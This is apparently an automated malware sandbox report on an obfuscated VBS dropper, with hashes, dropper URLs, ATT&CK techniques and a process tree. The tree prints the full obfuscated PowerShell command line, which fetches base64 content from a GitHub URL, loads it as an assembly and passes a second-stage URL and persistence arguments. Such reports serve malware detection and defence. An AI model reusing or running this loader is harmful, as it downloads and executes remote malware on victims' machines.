2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd

General

Target

2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs
Size

242KB
MD5

adadc5d47f87dd519f9a7da9ba03daf5
SHA1

3de39ed4ff76305d9dc87b484bf2b78d7f332dbf
SHA256

2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd
SHA512

93296d34e418a2885e2b9beb0c58078bb0d2f9ae7f27d39c6b404158e37d936efdd1ba10277ffbe5dc23a1bc26e0eb9d92e90a082ab7d44c4ffb39ff5d5ee1a0
SSDEEP

3072:KstfnxfYcd4gQu4Nl2YPfeesDvb7Ngt5pZGwRDaapS7emX8ANolXiZ+k+ugv/6xy:xfniUNYlMe6sAyY+uY6M/es

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2744	powershell.exe
6	2744	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2716	powershell.exe
2744	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2716	powershell.exe
2744	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 2716	2308	WScript.exe	30
PID 2308 wrote to memory of 2716	2308	WScript.exe	30
PID 2308 wrote to memory of 2716	2308	WScript.exe	30
PID 2716 wrote to memory of 2744	2716	powershell.exe	32
PID 2716 wrote to memory of 2744	2716	powershell.exe	32
PID 2716 wrote to memory of 2744	2716	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
04ebd72306ca3be31c5efce02280b815

SHA1
ae3102722d8612dc5bc06e466f74967699fe1401

SHA256
35364b4e24e0b7f3738f819ec395f97bc9ab6cf12ab4a99e33b940c939bb2161

SHA512
4457fcf6746098bc5a4d6cd5e711c72affc095ba623730ae7ad983f5b2e20936086fae2afbd4852654aad3fc542b52961e20b8b6da5fefb08c354398b3a6687f

Download Submit
memory/2716-4-0x000007FEF547E000-0x000007FEF547F000-memory.dmp

Filesize
4KB

Download
memory/2716-7-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2716-5-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/2716-9-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-8-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-10-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-16-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing